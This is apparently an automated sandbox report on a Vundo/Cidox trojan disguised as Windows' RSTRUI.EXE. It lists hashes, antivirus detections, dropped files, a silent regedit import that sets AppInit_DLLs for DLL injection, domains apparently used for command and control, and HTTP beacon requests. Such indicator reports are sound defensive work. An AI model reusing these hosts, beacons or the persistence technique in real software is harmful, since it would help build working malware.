Analysis Date | 2014-10-08 11:37:34 |
---|---|
MD5 | cfbdd820df44aa36a2575c0f22958b57 |
SHA1 | 0c16b6126fb75b1473f6af9447ec6622f4c78a28 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 13cc2cc8e384da536037e937ba7a07c7 sha1: 3b6f047661e98ebbaeda2e7379814973cbfc4313 size: 91136 | |
Section | _ASM2 md5: 1a932c7fa0a0eb8fb6d26f1f8905d189 sha1: 489594f1e9303a2903ffa00476b76b9a4766ce24 size: 63488 | |
Section | .rdata md5: 697c99e6dde9d3dcac304d26c87cc98b sha1: 00ef47a581e72f5f3047d4b8886ee2a33260ef4e size: 8192 | |
Section | .data md5: 6ae74fc20e4cf7b1e3a120e127950658 sha1: 195f91bc01ed5306654b41943751edba8e59b1c3 size: 5120 | |
Section | .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 | |
Section | .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304 | |
Timestamp | 2012-09-26 05:01:05 | |
Version | LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 4d1a23f74f3adcb3ccf36dd24ca511a862182928 | |
IMPhash | 26c8b4c4ce534a10cda2844fc8da413a | |
AV | 360 Safe | Gen:Variant.Spy.5 |
AV | Ad-Aware | Gen:Variant.Spy.5 |
AV | Alwil (avast) | Vundo-XK [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen7 |
AV | CA (E-Trust Ino) | Win32/Vundo.N!generic |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.Mayachok.17986 |
AV | Emsisoft | Gen:Variant.Spy.5 |
AV | Eset (nod32) | Win32/Kryptik.AMHQ |
AV | Fortinet | W32/Citirevo.AB!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Spy.5 |
AV | Grisoft (avg) | Generic29.BSEH |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | Backdoor ( 04c4f2bf1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.FakeMS.ED |
AV | Mcafee | Vundo-FASV!CFBDD820DF44 |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Spy.5 |
AV | Norman | winpe/Vundo.CRIM |
AV | Rising | no_virus |
AV | Sophos | Mal/Vundo-M |
AV | Symantec | Trojan.Gen.2 |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | TrojanDropper.Daws |
AV | Yara APT | no_virus |
AV | Zillya! | no_virus |
Runtime Details:
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\zzthrqe.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | denadb.com |
Winsock DNS | vertilaza.com |
Winsock DNS | 91.220.35.154 |
Winsock DNS | terrans.su |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | denareclick.com |
Winsock DNS | fescheck.com |
Winsock DNS | instrango.com |
Winsock DNS | verzinla.com |
Winsock DNS | getintsu.com |
Winsock DNS | tegimode.com |
Winsock DNS | netrovad.com |
Winsock DNS | nshouse1.com |
Winsock DNS | inzavora.com |
Winsock DNS | odobvare.com |
Winsock DNS | foradns.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\zzthrqe.dll\\x00 |
---|
Network Details:
DNS | getintsu.com Type: A 141.8.225.80 |
---|---|
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 141.8.225.80 |
DNS | fescheck.com Type: A 141.8.225.80 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | vertilaza.com Type: A |
DNS | verzinla.com\032 Type: A |
DNS | instrango.com Type: A |
DNS | netrovad.com Type: A |
DNS | odobvare.com Type: A |
DNS | terrans.su Type: A |
DNS | tegimode.com Type: A |
DNS | denadb.com Type: A |
DNS | foradns.com Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1 User-Agent: |
HTTP GET | http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzSqKc8+o8Cd User-Agent: |
HTTP GET | http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzWYJcslalVd User-Agent: |
HTTP GET | http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V5tSrUWFiWIV User-Agent: |
HTTP GET | http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1 User-Agent: |
HTTP GET | http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V+ZSgibLVKLa User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 91.220.35.154:80 |
Raw Pcap
Strings